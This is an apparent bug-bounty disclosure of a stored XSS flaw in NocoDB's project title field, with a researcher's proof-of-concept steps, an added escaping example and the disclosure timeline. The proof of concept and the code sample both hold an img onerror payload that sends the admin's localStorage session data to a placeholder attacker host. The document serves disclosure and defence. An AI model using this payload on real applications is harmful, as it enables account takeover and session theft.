Account takeover due to stored XSS in "Project Title" in nocodb/nocodb

Valid

Reported on

Jun 3rd 2022


Description

The project "Title" field of the NocoDB application is vulnerable to stored XSS, which can lead to admin account takeover.

Proof of Concept

Log in as a low-privileged user, click on "New Project", then click on "Create".

Now write the payload <img src=x onerror=this.src="http://hacker_server:port/?"+localStorage.getItem("vuex")> and click on "Create" again.

Then log in with the super admin account and "delete" the created project <img src=x onerror=this.src="http://hacker_server:port/?"+localStorage.getItem("vuex")>

PoC video

https://drive.google.com/file/d/1tVJFpajTWGOrgYvLj2eHfqcrLcWCSKnG/view?usp=sharing

Impact

Can take over all user accounts.
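The root cause is that a stored project title is interpolated into the page as HTML, so markup an attacker saves in the title runs in the admin's browser. The following is an added example (not NocoDB's code and not the content of the fix commit) showing the vulnerable rendering pattern beside an escaped one, plus a heuristic check that flags titles containing markup for review; all function names are illustrative and the sample payload is constructed with a placeholder host.

```javascript
// Added example, not NocoDB's code: escape untrusted project titles before
// they are interpolated into HTML. Function names are illustrative.

// Map each HTML-significant character to its entity.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: the stored title goes into markup unchanged, so a
// title containing a tag becomes live HTML when an admin views the project.
function renderTitleUnsafe(title) {
  return `<span class="project-title">${title}</span>`;
}

// Hardened pattern: same template, but the title is escaped first, so the
// browser shows the tag text literally instead of executing it.
function renderTitleSafe(title) {
  return `<span class="project-title">${escapeHtml(title)}</span>`;
}

// Defensive check usable at save time or over stored titles in a log
// pipeline: flags titles that contain raw tags, event-handler attributes or
// javascript: URLs as worth reviewing. Heuristic, not a replacement for escaping.
const SUSPICIOUS_TITLE = /<\s*[a-z!\/]|\bon[a-z]+\s*=|javascript:/i;
function looksLikeMarkup(title) {
  return SUSPICIOUS_TITLE.test(String(title));
}

// Constructed sample: the shape of payload described in the report, with a
// placeholder host instead of a real collector.
const SAMPLE_PAYLOAD =
  '<img src=x onerror=this.src="http://attacker.example/?"+localStorage.getItem("vuex")>';

if (typeof require !== 'undefined' && require.main === module) {
  console.log(renderTitleUnsafe(SAMPLE_PAYLOAD)); // tag survives intact
  console.log(renderTitleSafe(SAMPLE_PAYLOAD));   // tag rendered as text
  console.log(looksLikeMarkup(SAMPLE_PAYLOAD), looksLikeMarkup('Q3 Budget'));
}
```

Escaping must happen at render time for the context the value lands in; the same title needs different treatment inside an attribute, a URL or a script block.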

We are processing your report and will contact the nocodb team within 24 hours. a month ago
Raj modified the report
a month ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md 25 days ago
Raj
23 days ago

Researcher


Hello @admin the maintainer has provided the email id so can you pls invite them to this report

We have contacted a member of the nocodb team and are waiting to hear back 23 days ago
Jamie Slome
23 days ago

Admin


Sorted 👍

Raj modified the report
23 days ago
Raj modified the report
22 days ago
Raj
22 days ago

Researcher


@admin Pls send them the updated report

Raj
22 days ago

Researcher


@admin here is the poc video: https://drive.google.com/file/d/1tVJFpajTWGOrgYvLj2eHfqcrLcWCSKnG/view?usp=sharing

Raj
22 days ago

Researcher


@admin here is the poc video:

https://drive.google.com/file/d/1tVJFpajTWGOrgYvLj2eHfqcrLcWCSKnG/view?usp=sharing

of account takeover.

navi validated this vulnerability 22 days ago
Raj has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
navi confirmed that a fix has been merged on ffad5a 22 days ago
navi has been awarded the fix bounty
Raj
22 days ago

Researcher


@admin The fix is deployed so can you pls assign the cve?

Jamie Slome
21 days ago

Admin


The CVE has been assigned and should be published soon 👍
